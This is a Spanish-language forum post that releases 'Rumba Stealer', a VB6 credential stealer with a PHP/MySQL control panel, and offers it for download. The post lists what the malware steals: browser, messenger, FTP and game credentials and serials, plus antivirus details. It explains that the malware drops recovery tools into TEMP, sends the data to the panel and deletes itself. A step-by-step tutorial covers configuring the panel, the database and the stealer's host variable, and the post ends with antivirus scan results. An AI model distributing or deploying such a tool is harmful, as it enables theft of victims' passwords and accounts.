He decidido colgar por estos lares un stealer que empecé hace unos días pero que no lo terminé (tiene algunos errores).
El stealer lo único que hace es droppear los típicos programas de recovery de NirSoft y otros y envía los datos a una web (viene incluida).
Cosas del stealer:
- Droppea todo en la carpeta TEMP (fácil de cambiar).
- Autoelimina todos los archivos droppeados y a sí mismo.
- Obtiene información variada sobre el PC donde se ha ejecutado.
- Obtiene el antivirus, firewall y antispyware del PC (la función la encontré por google)
- Obtiene las credenciales de los navegadores más famosos (Firefox, Chrome, Opera, Safari y Sea Moneky).
- Obtiene las credenciales de los mensajeros instantáneos más famosos (son muchos, no los pondré aquí).
- Obtiene los seriales de muchos juegos.
- Obtiene las credenciales de los software de FTP más comunes (Filezilla, FTP Commander) aunque está bugueado, las credenciales se envian a la base de datos pero no se muestran en la página.
IMÁGENES DE LA WEB
Home
Users
(al clicar en un usuario se va a su página)
Página del usuario (información)
Página del usuario (credenciales)
TUTORIAL
Dentro del rar hay dos carpetas: Stealer y www + db.
Primero hay que modificar la web, para ello ir a la carpeta 'www + db'. Dentro de dicha carpeta está la carpeta 'includes' donde estarán varios archivos. Abrir el archivo 'config.php' y modificar lo siguiente:
ése será el título de la página$title = 'Rumba Stealer';
logo de la página (debe de estar dentro de la carpeta '/img'$logo = 'rumba.png';
Luego abrir el archivo 'connection.php' y modificar las variables con los datos del hosting donde se vaya a subir la web.
Dentro de la carpeta 'tools' están las 4 herramientas que se descargarán en el PC del remoto/usuario. Si no quieres que se descarguen del hosting web puedes subirlo a un servidor que permita hotlink (enlace que descarga directamente) como [Enlace externo eliminado para invitados].
También encontrarás el archivo 'db.sql' donde, obviamente, se encuentra la base de datos. Si subes la web pero no creas la base de datos no funcionará nada, está claro.
En la base de datos, en la tabla 'page_users' están los usuarios que podrán entrar en la página. También hay 2 tablas más 'page_visits' donde se muestran las visitas que se han hecho en la página y el referer (si tiene) y la tabla 'page_logins' donde se registran los logueos (usuario, IP y fecha).
Ahora toca configurar el stealer, para ello hay que ir a la carpeta 'Stealer' y abrir el archivo Rumba.vbp con tu VB6.
En el proyecto he puesto algunos comentarios pero por si acaso también lo pondré aquí.
El archivo principal es el módulo 'Start'. Ahí dentro hay 2 variables a cambiar.
Código: Seleccionar todo
host = "localhost"
path = Environ("TEMP")
'path' se cambia por la ruta donde se droppearán los archivos (OJO: la ruta no debe tener un '/' ni '\' al final).
Así ya debería bastar, pero si has subido las tools a otro servidor hay que cambiar las variables 'fileURL' de los módulos FTP, WBPV, MSPASS y GKR con las URL de las tools.
DISCLAIMER
- El template de la web la he encontrado por Internet ([Enlace externo eliminado para invitados]) pero todo lo demás lo he hecho yo.
- Eres libre de descargar, modificar y distribuir los archivos que subo a continuación sin mi permiso pero si los vas a subir a otro foro/web debes poner un enlace a la fuente (este tema).
- El stealer también lo he hecho completamente yo con algunas funciones/módulos encontrados por la red.
- Descárgalo bajo tu propia responsabilidad. En el archivo sólo hay 4 ejecutables (las tools) creadas por NirSoft, cakirbey y SecurityXploded.
- No me hago responsable del mal uso que le deis:good:
DESCARGA
[Enlace externo eliminado para invitados]
Testeado en Windows 7 64 bits
SCANS
chk4me Majyx Nodistribute